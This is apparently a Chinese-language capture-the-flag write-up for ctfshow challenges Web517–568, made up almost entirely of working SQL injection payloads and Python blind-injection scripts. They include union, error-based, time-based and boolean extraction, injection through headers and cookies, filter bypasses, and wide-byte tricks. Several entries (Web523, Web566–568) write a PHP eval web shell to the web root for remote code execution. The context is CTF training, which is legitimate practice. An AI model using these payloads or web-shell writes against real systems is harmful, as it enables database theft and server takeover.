Web517

url/?id=-1' union select 1,2, group_concat(flag) from ctfshow.flag%23

Web518

url/?id=-1 union select 1,2, group_concat(flagac) from ctfshow.flagaa %23

Web519

url/?id=-1') union select 1,23,group_concat(flagaca) from ctfshow.flagaanec %23

Web520

url/?id=-1") union select 1,2, group_concat(flag23) from ctfshow.flagsf%23

Web521

import requests

url = "http://5cac5d15-e898-47df-a612-0e244ff38ccf.challenge.ctf.show/?id=-1'"
string = "}abcdefghijklmnopqrstuvwxyz,0123456789-{"

if __name__ == '__main__':
    result = ''
    for i in range(0, 48):
        for j in string:
            end = "union select 1,2,if(substr((select group_concat(flag33) from ctfshow.flagpuck),{},1)='{}',sleep(3),1) %23".format(
                i, j)
            # end = "union select 1,2,if(substr((select group_concat(column_name) from information_schema.columns where table_name='flagpuck'),{},1)='{}',sleep(3),1) %23".format(i, j)
            # flagpuck表中的字段有 id,flag33
            # end = "union select 1,2,if(substr((select group_concat(table_name) from information_schema.tables where table_schema='ctfshow'),{},1)='{}',sleep(3),1) %23".format(i, j)
            # ctfshow库中的 表flagpuck
            # end = "union select 1,2,if(substr((select group_concat(schema_name) from information_schema.schemata),{},1)='{}',sleep(3),1) %23".format(i, j)
            # 获取到数据库 ctfshow
            try:
                req = requests.get(url + end, timeout=3)
            except:
                result += j
                print(f'[+] {result}')
                break

Web522

import requests

url = "http://11c8c313-edce-4f46-968d-f707bac1abdb.challenge.ctf.show/?id=-1\""
string = "}abcdefghijklmnopqrstuvwxyz,0123456789-{"
if __name__ == '__main__':
    result = ''
    for i in range(0, 48):
        for j in string:
            end = "union select 1,2,if(substr((select group_concat(flag3a3) from ctfshow.flagpa),{},1)='{}',sleep(3),1) %23".format(i, j)
            # end = "union select 1,2,if(substr((select group_concat(column_name) from information_schema.columns where table_name='flagpa'),{},1)='{}',sleep(3),1) %23".format(i, j)
            # flagpuck表中的字段有 id,flag3a3
            # end = "union select 1,2,if(substr((select group_concat(table_name) from information_schema.tables where table_schema='ctfshow'),{},1)='{}',sleep(3),1) %23".format(i, j)
            # ctfshow库中的 表flagpa
            #end = "union select 1,2,if(substr((select group_concat(schema_name) from information_schema.schemata),{},1)='{}',sleep(3),1) %23".format(i, j)
            # 获取到数据库  ctfshow,ctftraining
            req = requests.get(url+end)
            try:
                req = requests.get(url + end, timeout=3)
            except:
                result += j
                print(f'[+] {result}')
                break

Web523

http://179f1583-1d65-4bcc-80d5-a6f61df29838.challenge.ctf.show/?id=-1')) union select 1,2,"<?=eval($_POST[cmd]);?>" into outfile "/var/www/html/s.php" %23

访问url/s.php去RCE

Web524-Web526

同WEB522
大同小异,都是闭合符号换了

Web527

根据回显注入, POST传入

uname=-1' union select 1,group_concat(schema_name) from information_schema.schemata %23&passwd=1
uname=-1' union select 1,group_concat(table_name) from information_schema.tables where table_schema='ctfshow' %23&passwd=1
uname=-1' union select 1,group_concat(column_name) from information_schema.columns where table_name='flagugsd' %23&passwd=1
uname=-1' union select 1,group_concat(flag43s) from ctfshow.flagugsd %23&passwd=1

时间盲注脚本

import requests

url = "http://b5cb3426-57c3-4967-9875-805ee5505fa1.challenge.ctf.show/"

string = "}abcdefghijklmnopqrstuvwxyz,0123456789-{"
if __name__ == '__main__':
    result = ''
    for i in range(1, 48):
        for j in string:
            end = "-1' union select 1,if(substr((select group_concat(flag43s) from ctfshow.flagugsd),{},1)='{}',sleep(3),1) #".format(i, j)
            # end = "-1' union select 1,if(substr((select group_concat(column_name) from information_schema.columns where table_name='flagugsd'),{},1)='{}',sleep(3),1) #".format(i, j)
            # id,flag43s
            # end = "-1' union select 1,if(substr((select group_concat(table_name) from information_schema.tables where table_schema='ctfshow'),{},1)='{}',sleep(3),1) #".format(i, j)
            # ctfshow库中的 flagugsd
            # end = "-1' union select 1,if(substr((select group_concat(schema_name) from information_schema.schemata),{},1)='{}',sleep(3),1) #".format(i, j)
            # 获取到数据库  ctfshow,ctftraining

            data = {
                "uname": {end},
                "passwd": "1"
            }
            try:
                req = requests.post(url, data=data, timeout=3)
            except:
                result += j
                print(f'[+] {result}')
                break

Web528

POST传入 uname=") union select 1,group_concat(flag43as) from ctfshow.flagugsds %23&passwd=1

方法过程同Web527

Web529

import requests

url = "http://7ebd4809-9e8e-4575-acf4-5a92ab2624e0.challenge.ctf.show/"

string = "}abcdefghijklmnopqrstuvwxyz,0123456789-{"
if __name__ == '__main__':
    result = ''
    for i in range(1, 48):
        for j in string:
            end = "-1') union select 1,if(substr((select group_concat(flag4) from ctfshow.flag),{},1)='{}',sleep(3),1) #".format(i, j)
            #end = "-1') union select 1,if(substr((select group_concat(column_name) from information_schema.columns where table_name='flag'),{},1)='{}',sleep(3),1) #".format(i, j)
            # id,flag4
            # end = "-1') union select 1,if(substr((select group_concat(table_name) from information_schema.tables where table_schema='ctfshow'),{},1)='{}',sleep(3),1) #".format(i, j)
            # ctfshow库中的 flag
            # end = "-1') union select 1,if(substr((select group_concat(schema_name) from information_schema.schemata),{},1)='{}',sleep(3),1) #".format(i, j)
            # 获取到数据库  ctfshow,ctftraining

            data = {
                "uname": {end},
                "passwd": "1"
            }
            try:
                req = requests.post(url, data=data, timeout=3)
            except:
                result += j
                print(f'[+] {result}')
                break

Web530

import requests

url = "http://e09f7af6-facc-4383-8e66-f29ac04461f7.challenge.ctf.show/"

string = "}abcdefghijklmnopqrstuvwxyz,0123456789-{"
if __name__ == '__main__':
    result = ''
    for i in range(1, 48):
        for j in string:
            end = "-1\" union select 1,if(substr((select group_concat(flag4s) from ctfshow.flagb),{},1)='{}',sleep(3),1) #".format(i, j)
            # end = "-1\" union select 1,if(substr((select group_concat(column_name) from information_schema.columns where table_name='flagb'),{},1)='{}',sleep(3),1) #".format(i, j)
            # id,flag4s
            # end = "-1\" union select 1,if(substr((select group_concat(table_name) from information_schema.tables where table_schema='ctfshow'),{},1)='{}',sleep(3),1) #".format(i, j)
            # ctfshow库中的 flagb
            # end = "-1\" union select 1,if(substr((select group_concat(schema_name) from information_schema.schemata),{},1)='{}',sleep(3),1) #".format(i, j)
            # 获取到数据库  ctfshow,ctftraining

            data = {
                "uname": {end},
                "passwd": "1"
            }
            try:
                req = requests.post(url, data=data, timeout=3)
            except:
                result += j
                print(f'[+] {result}')
                break

Web531

同Web527脚本

Web532

import requests

url = "http://68849a46-f00a-43ae-9aaf-b48009c061ec.challenge.ctf.show/"

string = "}abcdefghijklmnopqrstuvwxyz,0123456789-{"
if __name__ == '__main__':
    result = ''
    for i in range(1, 48):
        for j in string:
            end = "-1\") union select 1,if(substr((select group_concat(flag4sa) from ctfshow.flagbab),{},1)='{}',sleep(3),1) #".format(i, j)
            # end = "-1\") union select 1,if(substr((select group_concat(column_name) from information_schema.columns where table_name='flagbab'),{},1)='{}',sleep(3),1) #".format(i, j)
            # id,flag4sa
            # end = "-1\") union select 1,if(substr((select group_concat(table_name) from information_schema.tables where table_schema='ctfshow'),{},1)='{}',sleep(3),1) #".format(i, j)
            # ctfshow库中的 flagbab
            # end = "-1\") union select 1,if(substr((select group_concat(schema_name) from information_schema.schemata),{},1)='{}',sleep(3),1) #".format(i, j)
            # 获取到数据库  ctfshow,ctftraining

            data = {
                "uname": {end},
                "passwd": "1"
            }
            try:
                req = requests.post(url, data=data, timeout=3)
            except:
                result += j
                print(f'[+] {result}')
                break

Web533

搭配上报错注入

uname=admin&passwd=admin' and updatexml(1,concat('~',(select right(flag4,30) from ctfshow.flag),0x7e),'~')#

uname=admin&passwd=admin' and updatexml(1,concat('~',(select right(flag4,30) from ctfshow.flag),0x7e),'~')#

将回显的flag进行组合

Web534

访问url,post传入 passwd=admin&uname=admin ,然后修改UA为下面的payload进行注入

'and updatexml(1,concat('~',(select group_concat(schema_name) from information_schema.schemata),'~'),1) and '
'and updatexml(1,concat('~',(select group_concat(table_name) from information_schema.tables where table_schema='ctfshow'),'~'),1) and '
'and updatexml(1,concat('~',(select group_concat(column_name) from information_schema.columns where table_name='flag'),'~'),1) and '
//获取flag 需要拼接
'and updatexml(1,concat('~',(select right(flag4,50) from ctfshow.flag),'~'),1) and '
'and updatexml(1,concat('~',(select right(flag4,20) from ctfshow.flag),'~'),1) and '

Web535

访问url,post传入 passwd=admin&uname=admin ,然后修改referer为下面的payload进行注入

'and updatexml(1,concat('~',(select group_concat(schema_name) from information_schema.schemata),'~'),1) and '
'and updatexml(1,concat('~',(select group_concat(table_name) from information_schema.tables where table_schema='ctfshow'),'~'),1) and '
'and updatexml(1,concat('~',(select group_concat(column_name) from information_schema.columns where table_name='flag'),'~'),1) and '
//获取flag 需要拼接
'and updatexml(1,concat('~',(select right(flag4,50) from ctfshow.flag),'~'),1) and '
'and updatexml(1,concat('~',(select right(flag4,20) from ctfshow.flag),'~'),1) and '

Web536

访问url,输入admin admin登陆 ,然后修改cookie为下面的payload进行注入

'and updatexml(1,concat('~',(select group_concat(schema_name) from information_schema.schemata),'~'),1) and '
'and updatexml(1,concat('~',(select group_concat(table_name) from information_schema.tables where table_schema='ctfshow'),'~'),1) and '
'and updatexml(1,concat('~',(select group_concat(column_name) from information_schema.columns where table_name='flag'),'~'),1) and '
//获取flag 需要拼接
'and updatexml(1,concat('~',(select right(flag4,50) from ctfshow.flag),'~'),1) and '
'and updatexml(1,concat('~',(select right(flag4,20) from ctfshow.flag),'~'),1) and '

Web537

访问url,输入admin admin登陆 ,然后修改cookie为下面的payload进行注入,payload需要base64加密

'and updatexml(1,concat('~',(select group_concat(schema_name) from information_schema.schemata),'~'),1) and '
'and updatexml(1,concat('~',(select group_concat(table_name) from information_schema.tables where table_schema='ctfshow'),'~'),1) and '
'and updatexml(1,concat('~',(select group_concat(column_name) from information_schema.columns where table_name='flag'),'~'),1) and '
//获取flag 需要拼接
'and updatexml(1,concat('~',(select right(flag4,50) from ctfshow.flag),'~'),1) and '
'and updatexml(1,concat('~',(select right(flag4,20) from ctfshow.flag),'~'),1) and '

Web538

执行两次payload base64加密,放入cookie

admin" and  updatexml(1,concat(0x7e,(select group_concat(flag4) from ctfshow.flag),0x7e),1)#
admin" and  updatexml(1,concat(0x7e,(select right(flag4,20) from ctfshow.flag),0x7e),1)#

Web539

url/?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema="ctfshow"'
url/?id=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name="flag" '  
url/?id=-1' union select 1,2,(select group_concat(flag4) from ctfshow.flag)'  

Web540

检测到or 或者 and 会被过滤替换为空,双写绕过

url/?id=-1' union select 1,2,(select group_concat(schema_name) from infoorrmation_schema.schemata) %23
url/?id=-1' union select 1,2,(select group_concat(table_name) from infoorrmation_schema.tables where table_schema='ctfshow') %23
url/?id=-1' union select 1,2,(select group_concat(column_name) from infoorrmation_schema.columns where table_name='flags') %23
url/?id=-1' union select 1,2,(select group_concat(flag4s) from ctfshow.flags) %23

或者使用显错注入

url/?id=-1' || updatexml(1,concat(0x7e,(select group_concat(flag4s) from ctfshow.flags),0x7e),1) %23

Web541

url/?id=-1 union select 1,2,group_concat(schema_name) from infoorrmation_schema.schemata  %23
url/?id=-1 union select 1,2,group_concat(table_name) from infoorrmation_schema.tables where table_schema='ctfshow'  %23
url/?id=-1 union select 1,2,group_concat(column_name) from infoorrmation_schema.columns where table_name='flags'  %23
url/?id=-1 union select 1,2,group_concat(flag4s) from ctfshow.flags  %23

Web542

过滤了空格,绕过不了,过滤了or可双写绕过

url/?id=a'||updatexml(1,concat(0x7e,(select(group_concat(schema_name))from(infoorrmation_schema.schemata)),0x7e),1)||%270
url/?id=a'||updatexml(1,concat(0x7e,(select(group_concat(table_name))from(infoorrmation_schema.tables)where(table_schema='ctfshow')),0x7e),1)||%270
url/?id=a'||updatexml(1,concat(0x7e,(select(group_concat(column_name))from(infoorrmation_schema.columns)where(table_name='flags')),0x7e),1)||%270

url/?id=a'|| updatexml(1,concat(0x7e,(select(right(flag4s,50))from(ctfshow.flags)),0x7e),1)||%270
url/?id=a'|| updatexml(1,concat(0x7e,(select(right(flag4s,20))from(ctfshow.flags)),0x7e),1)||%270

Web543

布尔盲注,笔者的脚本有些问题,但可以正常跑出来,最后的flag需要自己整理格式

import requests

url = "http://e799021a-75b8-4059-9c6e-8683f1247f3d.challenge.ctf.show/"

string = "}abcdefghijklmnopqrstuvwxyz,0123456789-{"
if __name__ == '__main__':
    result = ''
    for i in range(1, 48):
        for j in string:
            end = "?id=sibei'|| if(substr((select(group_concat(flag4s))from(ctfshow.flags)),{},1)='{}',1,0) || %270".format( i, j)
            # end = "?id=sibei'|| if(substr((select(group_concat(column_name))from(infoorrmation_schema.columns)where(table_name='flags')),{},1)='{}',1,0) || %270".format( i, j)
            # id,flag4s
            # end = "?id=sibei'|| if(substr((select(group_concat(table_name))from(infoorrmation_schema.tables)where(table_schema='ctfshow')),{},1)='{}',1,0) || %270".format(i, j)
            # ctfshow库中的 flags
            # end = "?id=sibei'|| if(substr((select(group_concat(schema_name))from(infoorrmation_schema.schemata)),{},1)='{}',1,0) || %270".format(i, j)
            # 获取到数据库  ctfshow,ctftraining

            req = requests.get(url + end)
            # print(req.text)
            if "Dumb" in req.text:
                result += j
                print(f'[+] {result}')
                break

Web545

过滤了union和select,可以大小写绕过

import requests

url = "http://3a158d9f-07a4-4fd0-9933-63d638665395.challenge.ctf.show/"

string = "}abcdefghijklmnopqrstuvwxyz,0123456789-{"
if __name__ == '__main__':
    result = ''
    for i in range(1, 48):
        for j in string:
            end = "?id=sibei'|| if(substr((SeLect(group_concat(flag4s))from(ctfshow.flags)),{},1)='{}',1,0) || %270".format( i, j)
            # end = "?id=sibei'|| if(substr((SeLect(group_concat(column_name))from(information_schema.columns)where(table_name='flags')),{},1)='{}',1,0) || %270".format( i, j)
            # id,flag4s
            # end = "?id=sibei'|| if(substr((SeLect(group_concat(table_name))from(information_schema.tables)where(table_schema='ctfshow')),{},1)='{}',1,0) || %270".format(i, j)
            # ctfshow库中的 flags
            # end = "?id=sibei'|| if(substr((SeLect(group_concat(schema_name))from(infoorrmation_schema.schemata)),{},1)='{}',1,0) || %270".format(i, j)
            # 获取到数据库  ctfshow,ctftraining

            req = requests.get(url + end)
            # print(req.text)
            if "Dumb" in req.text:
                result += j
                print(f'[+] {result}')
                break

Web546

*将Web545的脚本,语句的闭合符号换为 “ 即可

Web547-548

*将Web545的脚本,语句的闭合符号换为 ') (' 即可

Web549

双服务器,参数污染。详细: https://blog.csdn.net/weixin_45669205/article/details/115563306

url/?id=1&id=' union select 1,2,group_concat(schema_name) from information_schema.schemata %23
url/?id=1&id=' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='ctfshow' %23
url/?id=1&id=' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='flags' %23
url/?id=1&id=' union select 1,2,group_concat(flag4s) from ctfshow.flags %23

Web550

将Web549的URL,' 换成 "

Web551

将Web549的URL,' 换成 ")

Web552-553

宽字节注入漏洞, %df、%81、%E6、�均可绕过

问题代码  mysql_query("SET NAMES gbk");

payload

url/?id=%81' union select 1,2,group_concat(flag4s) from ctfshow.flags %23

Web554

post传入
passwd=admin&uname=1�' union select 1,group_concat(flag4s) from ctfshow.flags %23

Web555

url/?id=-1 union select 1,2, group_concat(flag4s) from ctfshow.flags %23

Web556

url/?id=-1�' union select 1,2, group_concat(flag4s) from ctfshow.flags %23

Web557

POST传入

passwd=admin&uname=admin�' union select 1, group_concat(flag4s) from ctfshow.flags%23

Web558

url/?id=-1' union select 1,2,group_concat(schema_name) from information_schema.schemata %23
url/?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='ctfshow' %23
url/?id=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='flags' %23
url/?id=-1' union select 1,2,group_concat(flag4s) from ctfshow.flags %23

Web559

url/?id=-1 union select 1,2,group_concat(schema_name) from information_schema.schemata %23
url/?id=-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='ctfshow' %23
url/?id=-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_name='flags' %23
url/?id=-1 union select 1,2,group_concat(flag4s) from ctfshow.flags %23

Web560

url/?id=-1') union select 1,2,group_concat(schema_name) from information_schema.schemata %23
url/?id=-1') union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='ctfshow' %23
url/?id=-1') union select 1,2,group_concat(column_name) from information_schema.columns where table_name='flags' %23
url/?id=-1') union select 1,2,group_concat(flag4s) from ctfshow.flags %23

Web561

url/?id=-1 union select 1,2,group_concat(schema_name) from information_schema.schemata %23
url/?id=-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='ctfshow' %23
url/?id=-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_name='flags' %23
url/?id=-1 union select 1,2,group_concat(flag4s) from ctfshow.flags %23

Web562

import requests

url = "http://4ec4e5c2-203e-4298-b37c-b1dabf7c38b8.challenge.ctf.show/login.php"

string = "}abcdefghijklmnopqrstuvwxyz,0123456789-{"
if __name__ == '__main__':
    result = ''
    for i in range(1, 48):
        for j in string:
            end = "Dumb' union select 1,2,if(substr((select group_concat(flag4s) from ctfshow.flags),{},1)='{}',sleep(3),1) #".format(i, j)
            # end = "Dumb' union select 1,if(substr((select group_concat(column_name) from information_schema.columns where table_name='flagbab'),{},1)='{}',sleep(3),1) #".format(i, j)
            # id,flag4s
            # end = "Dumb' union select 1,if(substr((select group_concat(table_name) from information_schema.tables where table_schema='ctfshow'),{},1)='{}',sleep(3),1) #".format(i, j)
            # ctfshow库中的 flags
            # end = "Dumb' union select 1,if(substr((select group_concat(schema_name) from information_schema.schemata),{},1)='{}',sleep(3),1) #".format(i, j)
            # 获取到数据库  ctfshow,ctftraining

            data = {
                "login_password": f"{end}",
                "login_user": "Dumb",
                "mysubmit": "Login"
            }
            try:
                req = requests.post(url, data=data, timeout=3)
            except:
                result += j
                print(f'[+] {result}')
                break

Web563

将562的脚本中的闭合符号换为')

Web564

import requests

url = "http://6db369c8-0ba6-434c-acef-88de140780d1.challenge.ctf.show/?sort="

string = "}abcdefghijklmnopqrstuvwxyz,0123456789-{"
if __name__ == '__main__':
    result = ''
    for i in range(1, 48):
        for j in string:
            end = "if(substr((select group_concat(flag4s) from ctfshow.flags),{},1)='{}',sleep(5),1) ".format(i, j)
            # end = "if(substr((select group_concat(column_name) from information_schema.columns where table_name='flagbab'),{},1)='{}',sleep(5),1) ".format(i, j)
            # id,flag4s
            # end = "if(substr((select group_concat(table_name) from information_schema.tables where table_schema='ctfshow'),{},1)='{}',sleep(5),1) ".format(i, j)
            # ctfshow库中的 flags
            # end = "if(substr((select group_concat(schema_name) from information_schema.schemata),{},1)='{}',sleep(5),1)".format(i, j)
            # 获取到数据库  ctfshow,ctftraining

            try:
                req = requests.get(url+end, timeout=5)
            except:
                result += j
                print(f'[+] {result}')
                break

Web564

url/?sort=updatexml(1,if(1=0,1,(select right(flag4s,50)from(ctfshow.flags))),1)
url/?sort=updatexml(1,if(1=0,1,(select right(flag4s,30)from(ctfshow.flags))),1)

Web565

url/?sort=' ||updatexml(1,if(1=0,1,(select right(flag4s,50)from(ctfshow.flags))),1)
url/?sort=' ||updatexml(1,if(1=0,1,(select right(flag4s,30)from(ctfshow.flags))),1)

Web566

url/?sort=1 into outfile '/var/www/html/2.php' lines terminated by '<?php eval($_POST[cmd]) ?>'-- -

Web567

url/?sort=1 into outfile '/var/www/html/2.php' lines terminated by '<?php eval($_POST[cmd]) ?>'-- -

Web568

url/?sort=1' into outfile '/var/www/html/2.php' lines terminated by '<?php eval($_POST[cmd]) ?>'-- -
最后修改:2022 年 06 月 19 日
如果觉得我的文章对你有用,请随意赞赏